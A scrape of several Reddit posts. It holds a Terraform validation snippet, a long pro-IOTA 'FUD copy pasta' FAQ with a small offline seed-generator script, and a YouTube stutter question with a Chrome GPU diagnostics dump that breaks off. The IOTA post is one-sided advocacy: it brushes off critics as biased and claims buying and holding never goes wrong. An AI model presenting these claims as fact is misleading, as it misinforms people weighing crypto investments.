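# Sketch: cross-variable guard. The local's value is never used for anything
# except triggering an error -- tobool() on a non-boolean string fails the
# plan, and the string surfaces in the error message.
locals {
  validate_admin_password = (
    var.disable_password_authentication == false && var.admin_password == null
    ? tobool("admin_password must be set when disable_password_authentication is false")
    : true
  )
}
```

With this in place, a plan that disables key-only auth but supplies no password aborts with the message above instead of silently applying.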
submitted by jsapkota to /r/Terraform

FUD Copy Pastas

**Last updated May 30, 2018:** Updated wallet info with release of Trinity.
This 4-part series from the IOTA Foundation covers most of the technical FUD aimed at IOTA.
The official IOTA FAQ also answers nearly all of these questions if you want to hear the answers directly.
Purpose of Writing
Since posting FUD is so ridiculously low-effort in comparison to setting the record straight, I felt it necessary to put a log of copy-pastas together to balance the scales, so it's just as easy to answer the FUD as it was to generate it. So next time you hear someone say "IOTA is centralized," you no longer have to take an hour out of your day and spin your wheels with someone who likely had an agenda to begin with. You just copy-paste away and move on.
It's also worth mentioning IOTA devs are too damn busy working on the protocol and doing their job to answer FUD. So I felt a semblance of responsibility.
Here they are. These answers are to my understanding, so if you see something that doesn't look right, let me know! They are divided into the following categories, so if you are interested in a specific aspect of IOTA you can scroll to that section.


IOTA was hacked and users' funds were stolen!

First, IOTA was not hacked. The term "hacked" is thrown around way too brazenly nowadays and is often used to describe events that weren't hacks to begin with. It's a symptom of this space growing way too fast, creating situations of the blind leading the blind and causing hysteria.
What happened:
Many IOTA users trusted a certain 3rd-party website to create the seed for their wallets. This website silently sent copies of all the seeds generated to an email address and waited until it felt it had enough funds, then it took everyone's money simultaneously. That was the "hack."
The lesson:
The absolute #1 marketed feature of crypto is that you are your own bank. Of everything that is common knowledge about crypto, this is at the top. But being your own bank means you are responsible for the security of your own funds. There is no safety net or centralized system in place that is going to bail you out.
For those that don't know (and you really should if you've invested in anything crypto), your seed is your username, password, security question and backup email all rolled into one. Would you trust a no-name 3rd-party website to produce your username and password for your bank account? Because that's essentially what users did.
The fix:
Make your seed offline with the generators in the sidebar, or use dice. This is outlined in the "How to generate wallet and seed" section directly following.
The Trinity and CarrIOTA wallets will have seed generators within them upon their release.
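As an illustration of "make your seed offline," here is a minimal sketch (my own toy code, not the official generator) that builds an 81-character seed from the IOTA alphabet of A–Z plus 9, using a cryptographically secure random source:

```python
import secrets

# IOTA seeds are 81 characters drawn from 'A'-'Z' and '9'.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ9"

def generate_seed(length: int = 81) -> str:
    """Generate a random IOTA seed offline using the OS's secure RNG."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

seed = generate_seed()
print(seed)  # keep this offline and private -- it IS your account
```

Run it on a machine with no network connection and write the result down; never paste a seed into a website.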

How to generate wallet and seed

1) Download the official Trinity wallet here
2) Follow the instructions in the app.
3) Do not run any other apps in conjunction with the Trinity app. Make sure all other apps are completely closed out on your device.

Are you sure a computer can’t just guess my seed?

An IOTA seed is 81 characters long. There are more IOTA seed combinations than atoms in the observable universe. All the computers in the world combined would take billions of years just to find your randomly generated one, located somewhere between the 0th and the 27^81st combination. The chance for someone to randomly generate the exact same seed as yours is 1 / (27^81).
If you can't fathom the number 27^81, this video should help:
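A quick back-of-the-envelope check of that claim (the ~10^80 figure for atoms in the observable universe is the commonly cited estimate):

```python
# Number of possible 81-character seeds over a 27-symbol alphabet (A-Z plus 9).
seed_space = 27 ** 81

# Commonly cited estimate for atoms in the observable universe.
atoms_in_universe = 10 ** 80

print(f"27^81 ~= 10^{len(str(seed_space)) - 1}")  # roughly 10^115
print(seed_space > atoms_in_universe)             # True
```

So the seed space is about 35 orders of magnitude larger than the atom count, which is why brute-forcing a properly generated seed is not a realistic threat.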

Why is Trinity wallet taking so long!!??

Trinity is out.


IOTA introduction video to share with family

Tangle visualizers

How to setup a full node

Download Bolero and run! Bolero is an all-in-one full node install package with the latest IOTA IRI and Nelson all under a one-click install!
"If you want to help the network then spam the network. If you really want to help the network then create a full node and let others spam you!"

No questions or concerns get upvoted, only downvoted!

That's just the nature of this business. Everyone in these communities has money at stake and is extremely incentivized to keep only positive news at the top of the front page. There is nothing you're going to do about that on this subreddit or any crypto subreddit. It's just a reddit fact of life we have to deal with. Everyone has a downvote and everyone has an upvote. But what can be done is to simply answer the questions, even if they are downvoted to hell. Yeah, most people won't see the answers or discussion, but that one person will. Every little bit counts.
I will say that there are most certainly answers to nearly every FUD topic out there. Every single one. A lot of the posts I'm seeing as of late, especially since the price spike, are rehashed from months ago. They often go unanswered not because there isn't an answer/explanation, but because the regulars who have the answers simply don't see them (for the reason listed above). I can see how it's easy for this to be interpreted (especially by new users) as there not being an answer, or "the FUDsters are on to something," but that's just not the case.

Developers' candidness (aka "the devs are assholes!")
Lastly, and to no surprise, David conducts himself very professionally in this interview, even when asked several tough questions about the coordinator and the MIT criticism.

IOTA Devs do not respond appropriately to criticism

When critics provide feedback that is ACTUALLY useful to the devs, then sure, they'll be glad to hear it. So far, not once has an outside dev brought up something that the IOTA devs found useful. Every single time it ends up being something that was already taken into consideration in the design, and if the critic had done an ounce of research they would know that. Thus you often find the IOTA devs dismissing their opinion as FUD and responding with hostility, because all their critique is really doing is sending the message to their supporters that they are not supposed to like IOTA anymore.
Nick Johnson was a perfect example of this. The Ethereum community was co-existing peacefully with IOTA's community (as they do with nearly all altcoins) until Nick wrote his infamous article. Then almost overnight Ethereum decided it didn't like IOTA anymore, and we've been dealing with that shit since. As of today, add LTC to that list with Charlie's (by his own admission) ignorant judgement of IOTA.
12/17/2017: Add John McAfee (bitcoin cash) and Peter Todd (bitcoin) to the list of public figures who have posted ignorantly on IOTA.

A lot of crypto communities certainly like to hate on IOTA...

IOTA is disrupting the disrupters. It invented a completely new distributed ledger infrastructure (the tangle) that replaces the blockchain and solves its fundamental problems (namely fees and scaling). To give you an idea of this significance, 99% of the cryptocurrencies that exist are built on a blockchain. These projects have billions of dollars invested into them, meaning everyone in their communities is incentivized to see IOTA fail and to spread as much FUD about it as possible. This includes well-known organizations, public figures, and brands. Everyone commenting in these subreddits and crypto communities has their own personal money at stake and skin in the game. Misinformation campaigns, paid reddit posters, upvote/downvote bots, and corrupt moderators are all very real in this space.


How do I buy IOTA

What is the IOTA foundation?

The IOTA Foundation is a non-profit established in Germany and recognized by the European Union. Blog post here:

How many companies and organizations are interested, partnered or actively using IOTA?

A lot, and often too many to keep up with.

How was IOTA distributed?

All IOTAs that will ever exist were sold at the ICO in 2015. There was no % reserved for development; the devs had to buy in with their personal money. The community then donated back 5% of all IOTA so the IOTA Foundation could be set up.

No inflation schedule? No additional coins? How is this sustainable?

Interestingly enough, IOTA is actually the only crypto that does not run into any problems with a currency cap and deflation. Because there are zero fees, you will always be able to pay for something for exactly what it's worth using IOTA, no matter how small the value. If by chance in the future a single iota grows so large in value that it no longer allows someone to pay for something in fractions of a penny, the foundation would just add decimal points, allowing a tenth or a hundredth or a thousandth of an iota to be transacted with.
To give you some perspective, if a single IOTA equals 1 penny, IOTA would have a 27 trillion dollar market cap (100x that of Bitcoin's today)
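The arithmetic behind that figure, using IOTA's fixed total supply of (3^33 − 1) / 2 iota (a publicly documented constant; the penny price is the hypothetical above, not a prediction):

```python
# Fixed total IOTA supply: (3**33 - 1) / 2 iota.
total_supply = (3**33 - 1) // 2   # 2,779,530,283,277,761 iota

price_per_iota = 0.01             # 1 penny, per the hypothetical
market_cap = total_supply * price_per_iota

print(f"{market_cap:.3e}")        # ~2.78e13, i.e. roughly 27.8 trillion dollars
```

So "a 27 trillion dollar market cap" is the right order of magnitude for a 1-cent iota.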

IOTA is not for P2P, only for M2M

With the release of the trinity wallet, it's now dead simple for anyone to use IOTA funds for P2P. Try it out.

Companies technically don’t have to use the IOTA token

Yes they do
Worth clarifying that 0-iota data transactions are perfectly fine and are welcomed, since they still provide PoW for 2 other transactions and help secure the network. In the early stages, these types of transactions will probably be what give us the TPS/PoW needed to remove the coordinator and allow the network to defend against 34% attacks organically.
But... if someone does not want to sell or exchange their data for free (a 0-IOTA transaction), then Dominik is saying that the IOTA token must be used for that or any exchange of value on the network.
This is inherently healthy for the ecosystem, since it provides a neutral, non-profit middle ground that all parties/companies can trust. If one company made their own token, it wouldn't be trusted, since companies are incentivized by profits and nothing is stopping them from manipulating their token to make themselves more money. Thus, the IOTA Foundation will not partner with anyone who refuses to take this option off the table.

All these companies are going to influence IOTA development!!

These companies have no influence on the development of IOTA. They either choose to use it or they don’t.

Internet of things is cheap and will stay cheap

The Internet of Things is one application of IOTA and is considered by many to be the 4th industrial revolution. Go do some googling. IOTA having zero fees enables M2M payments for the first time in history. Also, if a crypto can do M2M it sure as shit can do M2P and P2P. M2M is hard mode.

IOTA surpassing speculation

IOTA, through the data marketplace and Qubic, will be the first crypto to surpass speculation and actually be used in the real world for something. From there, it will branch out into other use cases, such as P2P. Or maybe P2P use of IOTA will grow in parallel with M2M, because why not?
12/19/17 update: Bosch reinforces IOTA's break-out from speculation by buying IOTA tokens for its future use in the data marketplace.

Investing in a new project barely off the ground

Investing in a project in its early stages was something typically reserved for wealthy individuals/organizations before ICOs became a thing. With early investing comes much less hand-holding and more responsibility on the user to know what they are doing. If you have a hard time accepting this responsibility, don't invest and wait for the technology to get easier for you. How many people actually knew how to use and mine bitcoin in 2009, before it had all its GUI infrastructure?
IOTA is a tangle, the first of its kind, NOT a copy-paste blockchain. As a result, wallets and applications for IOTA are the first of their kind, and translating the tangle into a nice, clean, user-friendly experience for the masses is even more taxing.

Why is the price of my coin falling?!

This may be the most asked question on any crypto subreddit, but it's also the easiest to explain. The price typically falls when bad things happen to a coin, or when media fabricates bad news about a coin and a portion of investors takes it seriously. The price increases when good things happen to a coin, such as a new exchange listing or an announced partnership. The one piece that is often forgotten, but trumps all of these effects, is something called "market forces."
Market forces are what happen to your coin when another coin gets a big news hit, or a group of other coins get big news hits together. For example, when the IOTA data marketplace was released, IOTA hit a 5x bull run in a single week. But did you notice all the other altcoins in the red? There are a LOT of traders that are looking at the space as a whole, looking to get in on ANY bull action, and they will sell their other coins to do so. This effect can also be compounded over a long period of time, such as what we witnessed when the bitcoin fork FOMO was going on and altcoins were squeezed continuously to feed it for weeks/months.
These examples really just scratch the surface of market forces but the big takeaway is that your coin or any coin will most certainly fall (or rise) in price at the result of what other coins are doing, with the most well known example being bitcoin’s correlation to every coin on the market. If you don't want to play the market-force game or don't have time for it, then you can never go wrong buying and holding.
It's also important to note that there are layers of investors. There's a top layer of light-stepping investors that are a mixture of day traders and gamblers trying to jump in and jump out to make quick money, then look for the next buying (or shorting) opportunity at another coin. There's a middle layer of buyers and holders who did their research, believe in the tech, and are placing their bets that it will win out in the long run. And the bottom layer is the founders and devs who are in it till the bitter end, there to see the vision realized. When a coin goes on a bull run, always expect that any day the top layer is going to pack up and leave for the next coin. But the long game is all about that middle layer. That is the layer that will give the bear markets their price-drop resistance. That is why the meme "HODL" is so effective: it very elegantly simplifies this whole concept for the common joe and makes them a part of that middle layer, regardless of whether they understand what's going on or not.


How is IOTA free and how does it scale

IOTA is an altruistic system. Proof of work is done in IOTA just like in bitcoin, except that instead of miners, a user's own device/phone must do PoW for 2 other transactions before issuing one of its own. Therefore there are no miners and no fees, and the network becomes faster the more transactions are posted. Because of this, spamming the network is encouraged, since spam transactions provide PoW for 2 other transactions and speed up the network.
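A conceptual sketch of that issue-one-approve-two rule. This is hypothetical toy code, not the real protocol: it uses uniform random tip selection and skips proof of work entirely, whereas the actual tip selection described in the white paper is a weighted random walk.

```python
import random

def issue_transaction(tangle: dict, tx_id: str) -> None:
    """Toy model: a new transaction must approve two existing tips
    (transactions nothing has approved yet) before it joins the tangle."""
    tips = [t for t, info in tangle.items() if not info["approved_by"]]
    chosen = random.sample(tips, k=min(2, len(tips)))
    for t in chosen:
        tangle[t]["approved_by"].append(tx_id)
    tangle[tx_id] = {"approves": chosen, "approved_by": []}

# Start from a genesis transaction and issue a few more.
tangle = {"genesis": {"approves": [], "approved_by": []}}
for i in range(5):
    issue_transaction(tangle, f"tx{i}")

print(len(tangle))  # 6 transactions, each newcomer approving up to 2 tips
```

The point of the toy is the incentive structure: every new transaction, spam included, does validation work for two others, so there is no separate miner class to pay.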

IOTA is centralized

IOTA is more decentralized than any blockchain crypto that relies on 5 pools of miners, all largely based in China. Furthermore, the coordinator is not a server in the devs' basement that secretly processes all the transactions. It's several nodes all around the globe that add milestone transactions to show the direction of the IF's tangle within the DAG, so people don't accidentally follow a fork from a malicious actor. Anyone with the know-how can fork the tangle right now with a double-spend. But no one would follow their fork, because the coordinator reveals which tangle is the legit IF one. If the coordinator wasn't there (assuming low honest-transaction volume), there would be no way to discern which path to follow, especially after the tangle diverges into forks of forks. Once the throughput of honest transactions is significant enough, the "honest tangle" will replace the coordinated one, and people will know which one to follow simply because it's the biggest one in the room.
Referencing the coordinator is also optional.
Also, if you research and understand how IOTA intends to work without the coordinator, it's easier to accept it for now as training wheels. I suggest reading pg. 15 and on of the white paper, which analyzes in great depth how the network will defend against different attack scenarios without a coordinator. For the past several months, the IOTA Foundation has been using St. Petersburg college's supercomputer to stress test IOTA and learn when they can turn the coordinator off. There will likely be a blog about the results soon.
This is another great read covering double spends on IOTA without a coordinator:
This too:
Also this correspondence with Vitalik and Come_from_Beyond
At the end of the day, extraordinary claims require extraordinary evidence, and folks approaching IOTA with an "I'll believe it when I see it" attitude is completely understandable. It's all about your risk tolerance.

Can IOTA defend double spend attacks?

99% of these "but did they think about double-spend attacks?" type questions could be answered if people just went and did their own research. Yes, of course they thought about that. That's like crypto 101…

Will IOTA have smart contracts?

Yes -

Trinary vs binary?

"By using a ternary number system, the amount of devices and cycles can be reduced significantly. In contrast to two-state devices, multistate devices provide better radix economy with the option for further scaling"

Bitcoin with lightning network will make IOTA obsolete.

If you want the Lightning Network, IOTA has already released its equivalent, called Flash Channels.

IOTA rolled its own crypto!
This is why:
Cybercrypt has been hired to review and audit it. IOTA is currently running SHA-3/Keccak until Curl is ready.

MIT said bad things about IOTA
And for official formal closure that MIT was completely wrong:

Nick Johnson says IOTA is bad!

Nick Johnson is an Ethereum dev who is incentivized to see IOTA fail; see CFB's twitter responses here.
And this
And this
And this

IOTA is not private!

Masked Authenticated Messaging (MAM) exists right now, so data can be transferred privately. Very important for businesses.

Coin privacy

A centralized coin mixer run by the foundation is out. Logs are kept so they can collect data and improve it. Folks can copy the coin mixer code and run it themselves. The goal is for the mixer to be decentralized and run by any node.

How do nodes scale? How on earth can all that data be stored?

Full nodes store, update and verify from the last snapshot, which happens roughly every month. It's on the roadmap to make snapshotting automatic and up to each full node's discretion. With automatic snapshots, each full node will act as a partial perma-node and choose when to snapshot its tangle data. If someone wants to keep their tangle data for several months or even years, they could just choose not to snapshot. Or, if they are limited on hard drive space, they could snapshot every week.
Perma-nodes would store the entire history of the tangle from the genesis. These are optional and would likely only be created by companies who wish to sell historical access of the tangle as a service or companies who heavily use the tangle for their own data and want to have quick, convenient access to their data’s history.
Swarm nodes are also in development which will ease the burden on full nodes.

Node discovery is manual? Wtf?

Nelson has fixed this:

IOTA open source?
The IOTA protocol is open source. The coordinator is ~~closed source~~ open source.

Foundation moved users' funds?

My IOTA donation address:

submitted by mufinz2 to /r/Iota

YouTube fullscreen stutter

Just like the title says: I'm getting a weird stutter every 3 seconds when playing YouTube videos in fullscreen. Hardware acceleration on or off doesn't matter. I have a GTX 1060; even 4K should be no problem. Has anyone run into this issue?
Graphics Feature Status Canvas: Hardware accelerated Flash: Hardware accelerated Flash Stage3D: Hardware accelerated Flash Stage3D Baseline profile: Hardware accelerated Compositing: Hardware accelerated Multiple Raster Threads: Enabled Out-of-process Rasterization: Disabled Hardware Protected Video Decode: Hardware accelerated Rasterization: Hardware accelerated Skia Renderer: Disabled Video Decode: Hardware accelerated Viz Display Compositor: Enabled Viz Hit-test Surface Layer: Disabled WebGL: Hardware accelerated WebGL2: Hardware accelerated Driver Bug Workarounds clear_uniforms_before_first_program_use decode_encode_srgb_for_generatemipmap disable_delayed_copy_nv12 disable_direct_composition_layers disable_discard_framebuffer exit_on_context_lost force_cube_complete scalarize_vec_and_mat_constructor_args disabled_extension_GL_KHR_blend_equation_advanced disabled_extension_GL_KHR_blend_equation_advanced_coherent Problems Detected Some drivers are unable to reset the D3D device in the GPU process sandbox Applied Workarounds: exit_on_context_lost Clear uniforms before first program use on all platforms: 124764, 349137 Applied Workarounds: clear_uniforms_before_first_program_use Always rewrite vec/mat constructors to be consistent: 398694 Applied Workarounds: scalarize_vec_and_mat_constructor_args ANGLE crash on glReadPixels from incomplete cube map texture: 518889 Applied Workarounds: force_cube_complete Framebuffer discarding can hurt performance on non-tilers: 570897 Applied Workarounds: disable_discard_framebuffer Disable KHR_blend_equation_advanced until cc shaders are updated: 661715 Applied Workarounds: disable(GL_KHR_blend_equation_advanced), disable(GL_KHR_blend_equation_advanced_coherent) Decode and Encode before generateMipmap for srgb format textures on Windows: 634519 Applied Workarounds: decode_encode_srgb_for_generatemipmap Delayed copy NV12 displays incorrect colors on NVIDIA drivers.: 728670 Applied Workarounds: disable_delayed_copy_nv12 Hardware 
overlays result in black videos on non-Intel GPUs: 932879 Applied Workarounds: disable_direct_composition_layers ANGLE Features disable_program_caching_for_transform_feedback (Frontend workarounds): Disabled On Qualcomm GPUs, program binaries don't contain transform feedback varyings lose_context_on_out_of_memory (Frontend workarounds): Enabled Some users rely on a lost context notification if a GL_OUT_OF_MEMORY error occurs scalarize_vec_and_mat_constructor_args (Frontend workarounds) 398694: Enabled Always rewrite vec/mat constructors to be consistent sync_framebuffer_bindings_on_tex_image (Frontend workarounds): Disabled On Windows Intel OpenGL drivers TexImage sometimes seems to interact with the Framebuffer add_dummy_texture_no_render_target (D3D workarounds) anglebug:2152: Disabled On D3D ntel drivers <4815 when rendering with no render target, two bugs lead to incorrect behavior allow_clear_for_robust_resource_init (D3D workarounds) 941620: Disabled Some drivers corrupt texture data when clearing for robust resource initialization. 
call_clear_twice (D3D workarounds) 655534: Disabled On some Intel drivers, using clear() may not take effect depth_stencil_blit_extra_copy (D3D workarounds) anglebug:1452: Disabled Bug in NVIDIA D3D11 Driver version <=347.88 and >368.81 triggers a TDR when using CopySubresourceRegion from a staging texture to a depth/stencil disable_b5g6r5_support (D3D workarounds): Disabled On Intel and AMD drivers, textures with the format DXGI_FORMAT_B5G6R5_UNORM have incorrect data emulate_isnan_float (D3D workarounds) 650547: Disabled On some Intel drivers, using isnan() on highp float will get wrong answer emulate_tiny_stencil_textures (D3D workarounds): Disabled On some AMD drivers, 1x1 and 2x2 mips of depth/stencil textures aren't sampled correctly expand_integer_pow_expressions (D3D workarounds): Enabled The HLSL optimizer has a bug with optimizing 'pow' in certain integer-valued expressions flush_after_ending_transform_feedback (D3D workarounds): Enabled NVIDIA drivers sometimes write out-of-order results to StreamOut buffers when transform feedback is used to repeatedly write to the same buffer positions force_atomic_value_resolution (D3D workarounds) anglebug:3246: Enabled On an NVIDIA D3D driver, the return value from RWByteAddressBuffer.InterlockedAdd does not resolve when used in the .yzw components of a RWByteAddressBuffer.Store operation get_dimensions_ignores_base_level (D3D workarounds): Enabled Some NVIDIA drivers do not take into account the base level of the texture in the results of the HLSL GetDimensions builtin mrt_perf_workaround (D3D workarounds): Enabled Some NVIDIA D3D11 drivers have a bug where they ignore null render targets pre_add_texel_fetch_offsets (D3D workarounds): Disabled On some Intel drivers, HLSL's function texture.Load returns 0 when the parameter Location is negative, even if the sum of Offset and Location is in range rewrite_unary_minus_operator (D3D workarounds): Disabled On some Intel drivers, evaluating unary minus operator on integer 
may get wrong answer in vertex shaders select_view_in_geometry_shader (D3D workarounds): Disabled The viewport or render target slice will be selected in the geometry shader stage for the ANGLE_multiview extension set_data_faster_than_image_upload (D3D workarounds): Enabled Set data faster than image upload skip_vs_constant_register_zero (D3D workarounds): Enabled On NVIDIA D3D driver v388.59 in specific cases the driver doesn't handle constant register zero correctly use_instanced_point_sprite_emulation (D3D workarounds): Disabled Some D3D11 renderers do not support geometry shaders for pointsprite emulation use_system_memory_for_constant_buffers (D3D workarounds) 593024: Disabled On some Intel drivers, copying from staging storage to constant buffer storage does not work zero_max_lod (D3D workarounds): Disabled D3D11 is missing an option to disable mipmaps on a mipmapped texture Version Information Data exported 2019-09-19T22:36:16.565Z Chrome version Chrome/77.0.3865.90 Operating system Windows NT 10.0.17763 Software rendering list URL Driver bug list URL ANGLE commit id 7cf862c9fcd2 2D graphics backend Skia/77 a10014304cba4f24b7af17191f59490faa8aee77 Command Line "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --flag-switches-begin --ignore-gpu-blacklist --enable-features=D3D11VideoDecoder --flag-switches-end Driver Information Initialization time 1000 In-process GPU false Passthrough Command Decoder true Sandboxed true GPU0 VENDOR = 0x10de [Google Inc.], DEVICE= 0x1c03 [ANGLE (NVIDIA GeForce GTX 1060 6GB Direct3D11 vs_5_0 ps_5_0)] ACTIVE Optimus false AMD switchable false Desktop compositing Aero Glass Direct composition true Supports overlays false YUY2 overlay support NONE NV12 overlay support NONE Diagonal Monitor Size of \.\DISPLAY2 31.9" Diagonal Monitor Size of \.\DISPLAY2 23.0" Driver D3D12 feature level D3D 12.1 Driver Vulkan API version Vulkan API 1.1.0 Driver vendor NVIDIA Driver version 436.30 Driver date 9-5-2019 GPU CUDA compute 
capability major version 6 Pixel shader version 5.0 Vertex shader version 5.0 Max. MSAA samples 8 Machine model name Machine model version GL_VENDOR Google Inc. GL_RENDERER ANGLE (NVIDIA GeForce GTX 1060 6GB Direct3D11 vs_5_0 ps_5_0) GL_VERSION OpenGL ES 2.0.0 (ANGLE GL_EXTENSIONS GL_ANGLE_client_arrays GL_ANGLE_depth_texture GL_ANGLE_explicit_context GL_ANGLE_explicit_context_gles1 GL_ANGLE_framebuffer_blit GL_ANGLE_framebuffer_multisample GL_ANGLE_instanced_arrays GL_ANGLE_lossy_etc_decode GL_ANGLE_memory_size GL_ANGLE_multi_draw GL_ANGLE_multiview_multisample GL_ANGLE_pack_reverse_row_order GL_ANGLE_program_cache_control GL_ANGLE_provoking_vertex GL_ANGLE_request_extension GL_ANGLE_robust_client_memory GL_ANGLE_texture_compression_dxt3 GL_ANGLE_texture_compression_dxt5 GL_ANGLE_texture_usage GL_ANGLE_translated_shader_source GL_CHROMIUM_bind_generates_resource GL_CHROMIUM_bind_uniform_location GL_CHROMIUM_color_buffer_float_rgb GL_CHROMIUM_color_buffer_float_rgba GL_CHROMIUM_copy_compressed_texture GL_CHROMIUM_copy_texture GL_CHROMIUM_lose_context GL_CHROMIUM_sync_query GL_EXT_blend_func_extended GL_EXT_blend_minmax GL_EXT_color_buffer_half_float GL_EXT_debug_marker GL_EXT_discard_framebuffer GL_EXT_disjoint_timer_query GL_EXT_draw_buffers GL_EXT_float_blend GL_EXT_frag_depth GL_EXT_instanced_arrays GL_EXT_map_buffer_range GL_EXT_occlusion_query_boolean GL_EXT_read_format_bgra GL_EXT_robustness GL_EXT_sRGB GL_EXT_shader_texture_lod GL_EXT_texture_compression_bptc GL_EXT_texture_compression_dxt1 GL_EXT_texture_compression_s3tc_srgb GL_EXT_texture_filter_anisotropic GL_EXT_texture_format_BGRA8888 GL_EXT_texture_rg GL_EXT_texture_storage GL_EXT_unpack_subimage GL_KHR_debug GL_KHR_parallel_shader_compile GL_NV_EGL_stream_consumer_external GL_NV_fence GL_NV_pack_subimage GL_NV_pixel_buffer_object GL_OES_EGL_image GL_OES_EGL_image_external GL_OES_depth24 GL_OES_depth32 GL_OES_element_index_uint GL_OES_get_program_binary GL_OES_mapbuffer GL_OES_packed_depth_stencil 
GL_OES_rgb8_rgba8 GL_OES_standard_derivatives GL_OES_surfaceless_context GL_OES_texture_3D GL_OES_texture_border_clamp GL_OES_texture_float GL_OES_texture_float_linear GL_OES_texture_half_float GL_OES_texture_half_float_linear GL_OES_texture_npot GL_OES_vertex_array_object OES_compressed_EAC_R11_signed_texture OES_compressed_EAC_R11_unsigned_texture OES_compressed_EAC_RG11_signed_texture OES_compressed_EAC_RG11_unsigned_texture OES_compressed_ETC2_RGB8_texture OES_compressed_ETC2_RGBA8_texture OES_compressed_ETC2_punchthroughA_RGBA8_texture OES_compressed_ETC2_punchthroughA_sRGB8_alpha_texture OES_compressed_ETC2_sRGB8_alpha8_texture OES_compressed_ETC2_sRGB8_texture Disabled Extensions GL_KHR_blend_equation_advanced GL_KHR_blend_equation_advanced_coherent Disabled WebGL Extensions Window system binding vendor Google Inc. (adapter LUID: 0000000000213440) Window system binding version 1.4 (ANGLE Window system binding extensions EGL_EXT_create_context_robustness EGL_ANGLE_d3d_share_handle_client_buffer EGL_ANGLE_d3d_texture_client_buffer EGL_ANGLE_surface_d3d_texture_2d_share_handle EGL_ANGLE_query_surface_pointer EGL_ANGLE_window_fixed_size EGL_ANGLE_keyed_mutex EGL_ANGLE_surface_orientation EGL_ANGLE_direct_composition EGL_ANGLE_windows_ui_composition EGL_NV_post_sub_buffer EGL_KHR_create_context EGL_EXT_device_query EGL_KHR_image EGL_KHR_image_base EGL_KHR_gl_texture_2D_image EGL_KHR_gl_texture_cubemap_image EGL_KHR_gl_renderbuffer_image EGL_KHR_get_all_proc_addresses EGL_KHR_stream EGL_KHR_stream_consumer_gltexture EGL_NV_stream_consumer_gltexture_yuv EGL_ANGLE_flexible_surface_compatibility EGL_ANGLE_stream_producer_d3d_texture EGL_ANGLE_create_context_webgl_compatibility EGL_CHROMIUM_create_context_bind_generates_resource EGL_CHROMIUM_sync_control EGL_EXT_pixel_format_float EGL_KHR_surfaceless_context EGL_ANGLE_display_texture_share_group EGL_ANGLE_create_context_client_arrays EGL_ANGLE_program_cache_control EGL_ANGLE_robust_resource_initialization 
EGL_ANGLE_create_context_extensions_enabled EGL_ANDROID_blob_cache EGL_ANDROID_recordable EGL_ANGLE_image_d3d11_texture EGL_ANGLE_create_context_backwards_compatible Direct rendering version unknown Reset notification strategy 0x8252 GPU process crash count 0 gfx::BufferFormats supported for allocation and texturing R_8: not supported, R_16: not supported, RG_88: not supported, BGR_565: not supported, RGBA_4444: not supported, RGBX_8888: not supported, RGBA_8888: not supported, BGRX_8888: not supported, BGRX_1010102: not supported, RGBX_1010102: not supported, BGRA_8888: not supported, RGBA_F16: not supported, YVU_420: not supported, YUV_420_BIPLANAR: not supported, UYVY_422: not supported, P010: not supported Compositor Information Tile Update Mode One-copy Partial Raster Enabled GpuMemoryBuffers Status R_8 Software only R_16 Software only RG_88 Software only BGR_565 Software only RGBA_4444 Software only RGBX_8888 GPU_READ, SCANOUT RGBA_8888 GPU_READ, SCANOUT BGRX_8888 Software only BGRX_1010102 Software only RGBX_1010102 Software only BGRA_8888 Software only RGBA_F16 Software only YVU_420 Software only YUV_420_BIPLANAR Software only UYVY_422 Software only P010 Software only Display(s) Information Info Display[2779098405] bounds=[0,0 1536x864], workarea=[0,0 1536x824], scale=1.25, external. 
Color space information {primaries:BT709, transfer:IEC61966_2_1, matrix:RGB, range:FULL} SDR white level in nits 80 Bits per color component 8 Bits per pixel 24 Refresh Rate in Hz 60 Video Acceleration Information Decode h264 baseline up to 4096x2304 pixels Decode h264 baseline up to 2304x4096 pixels Decode h264 main up to 4096x2304 pixels Decode h264 main up to 2304x4096 pixels Decode h264 high up to 4096x2304 pixels Decode h264 high up to 2304x4096 pixels Decode vp9 profile0 up to 8192x8192 pixels Decode vp9 profile0 up to 8192x8192 pixels Encode h264 baseline up to 3840x2176 pixels and/or 30.000 fps Encode h264 main up to 3840x2176 pixels and/or 30.000 fps Encode h264 high up to 3840x2176 pixels and/or 30.000 fps Diagnostics 0 b3DAccelerationEnabled true b3DAccelerationExists true bAGPEnabled true bAGPExistenceValid true bAGPExists true bCanRenderWindow true bDDAccelerationEnabled true bDriverBeta false bDriverDebug false bDriverSigned false bDriverSignedValid false bNoHardware false dwBpp 32 dwDDIVersion 12 dwHeight 1080 dwRefreshRate 60 dwWHQLLevel 0 dwWidth 1920 iAdapter 0 lDriverSize 961896 lMiniVddSize 0 szAGPStatusEnglish Enabled szAGPStatusLocalized Enabled szChipType GeForce GTX 1060 6GB szD3DStatusEnglish Enabled szD3DStatusLocalized Enabled szDACType Integrated RAMDAC szDDIVersionEnglish 12 szDDIVersionLocalized 12 szDDStatusEnglish Enabled szDDStatusLocalized Enabled szDXVAHDEnglish Supported szDXVAModes szDescription NVIDIA GeForce GTX 1060 6GB szDeviceId 0x1C03 szDeviceIdentifier {D7B71E3E-5F43-11CF-DC55-6F411BC2D735} szDeviceName \.\DISPLAY2 szDisplayMemoryEnglish 14219 MB szDisplayMemoryLocalized 14219 MB szDisplayModeEnglish 1920 x 1080 (32 bit) (60Hz) szDisplayModeLocalized 1920 x 1080 (32 bit) (60Hz) szDriverAssemblyVersion szDriverAttributes Final Retail szDriverDateEnglish 05/09/2019 03:00:00 szDriverDateLocalized 9/5/2019 03:00:00 szDriverLanguageEnglish English szDriverLanguageLocalized English szDriverModelEnglish WDDM 2.5 
